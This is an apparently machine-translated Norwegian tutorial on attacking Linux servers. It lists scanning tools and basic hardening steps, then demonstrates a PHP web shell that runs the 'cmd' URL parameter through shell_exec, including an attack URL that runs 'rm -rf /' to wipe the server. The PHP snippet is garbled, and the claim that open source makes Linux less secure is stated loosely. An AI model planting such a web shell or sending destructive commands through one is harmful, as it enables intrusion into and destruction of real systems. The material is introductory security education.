Hacking Linux OS: Hacking med Ubuntu (Commands Tutorial)

Innholdsfortegnelse:

Anonim

Linux er det mest brukte serveroperativsystemet, spesielt for webservere. Det er åpen kildekode; Dette betyr at alle kan ha tilgang til kildekoden. Dette gjør det mindre sikkert sammenlignet med andre operativsystemer, ettersom angripere kan studere kildekoden for å finne sårbarheter . Linux for Hackers handler om å utnytte disse sårbarhetene for å få uautorisert tilgang til et system.

I denne artikkelen vil vi introdusere deg for hva Linux er, dets sikkerhetsproblemer, hacking med Ubuntu og mottiltak du kan sette på plass.

Emner dekket i denne opplæringen

  • Rask merknad om Linux
  • Linux hackingsverktøy
  • Hvordan forhindre Linux-hacks
  • Hacking-aktivitet: Hack et Linux-system ved hjelp av PHP

Rask merknad om Linux

Linux er et operativsystem med åpen kildekode . Det er mange distribusjoner av Linux-baserte operativsystemer som Redhat, Fedora og Ubuntu, etc. I motsetning til andre operativsystemer er Linux mindre sikker når det gjelder sikkerhet. Dette er fordi kildekoden er tilgjengelig fritt, så det er enkelt å studere den for sårbarheter og utnytte dem sammenlignet med andre operativsystemer som ikke er åpen kildekode. Linux kan brukes som server-, skrivebord-, nettbrett- eller mobilenhetsoperativsystem.

Linux-programmer kan brukes enten ved hjelp av GUI eller kommandoer. Linux-kommandoene for Kali Linux-hacking er mer effektive og effektive sammenlignet med bruk av GUI. Av denne grunn hjelper det å kjenne grunnleggende Linux-kommandoer for hacking.

Se disse veiledningene https://www.guru99.com/unix-linux-tutorial.html om hvordan du kommer i gang med Kali Linux-hacks.

Linux hackingsverktøy

  • Nessus - dette verktøyet kan brukes til Ubuntu-hack, skannekonfigurasjonsinnstillinger, oppdateringer og nettverk osv. Det finnes på https://www.tenable.com/products/nessus
  • NMap. Dette verktøyet kan brukes til å overvåke verter som kjører på serveren og tjenestene de bruker. Den kan også brukes til å skanne etter porter. Den finner du på https://nmap.org/
  • SARA - SARA er forkortelsen for Security Auditors Research Assistant. Som navnet antyder, kan dette verktøyet brukes til å revidere nettverk mot trusler som SQL Injection, XSS etc. det finnes på http://www-arc.com/sara/sara.html

Ovennevnte liste er ikke uttømmende; det gir deg en ide om verktøyene som er tilgjengelige for Ubuntu-hacking og hacking av Linux-systemer.

Hvordan forhindre Linux-hacks

Linux Hacking utnytter sårbarhetene i operativsystemet. En organisasjon kan vedta følgende policy for å beskytte seg mot slike angrep.

  • Patch management - lapper fikser feil som angripere utnytter for å kompromittere et system. En god policy for håndtering av oppdateringer vil sikre at du hele tiden bruker relevante oppdateringer på systemet ditt.
  • Riktig OS-konfigurasjon - andre utnyttelser utnytter svakhetene i konfigurasjonen av serveren. Inaktive brukernavn og demoner bør deaktiveres. Standardinnstillinger som vanlige passord til applikasjon, standard brukernavn og noen portnumre bør endres.
  • Intrusion Detection System - slike verktøy kan brukes til å oppdage uautorisert tilgang til systemet. Noen verktøy har evnen til å oppdage og forhindre slike angrep.

Hackingsaktivitet: Hack et Ubuntu Linux-system ved hjelp av PHP

I dette praktiske scenariet vil vi lære å hacke med Ubuntu, og vi vil gi deg grunnleggende informasjon om hvordan du kan bruke PHP til å kompromittere en Linux. Vi skal ikke målrette noe offer. Hvis du vil prøve det, kan du installere LAMPP på din lokale maskin.

PHP kommer med to funksjoner som kan brukes til å utføre Linux-hackingskommandoer. Den har exec () og shell_exec () funksjoner. Funksjonen exec () returnerer den siste linjen i kommandoutgangen mens shell_exec () returnerer hele resultatet av kommandoen som en streng.

For demonstrasjonsformål, la oss anta at angriperledere laster opp følgende fil på en webserver.

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

HER,

Ovenstående skript får kommandoen fra GET-variabelen som heter cmd. Kommandoen utføres ved hjelp av shell_exec () og resultatene returneres i nettleseren.

Ovennevnte kode kan utnyttes ved hjelp av følgende URL

http: //localhost/cp/konsole.php? cmd = ls% 20-l

HER,

  • “… Konsole.php? Cmd = ls% 20-l” tilordner verdien ls -l til variabelen cmd .

Kommandoen i Ubuntu for hacking mot serveren vil bli utført som

shell_exec('ls -l') ;

Å utføre ovennevnte kode på en webserver gir resultater som ligner på følgende.

Ovennevnte kommando viser ganske enkelt filene i den gjeldende katalogen og tillatelsene

La oss anta at angriperen overfører følgende kommando

rm -rf /

HER,

  • “Rm” fjerner filene
  • “Rf” gjør rm-kommandoen i en rekursiv modus. Slette alle mappene og filene
  • “/” Instruerer kommandoen om å begynne å slette filer fra rotkatalogen

Angreps-URL-en vil se omtrent slik ut

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Sammendrag

  • Linux er et populært operativsystem for servere, stasjonære datamaskiner, nettbrett og mobile enheter.
  • Linux er åpen kildekode, og kildekoden kan fås av alle. Dette gjør det enkelt å oppdage sårbarhetene. Det er et av de beste operativsystemene for hackere.
  • Grunnleggende kommandoer for hacking og nettverk i Ubuntu er verdifulle for Linux-hackere.
  • Sårbarheter er en svakhet som kan utnyttes for å kompromittere et system.
  • En god sikkerhet kan bidra til å beskytte et system fra å bli kompromittert av en angriper.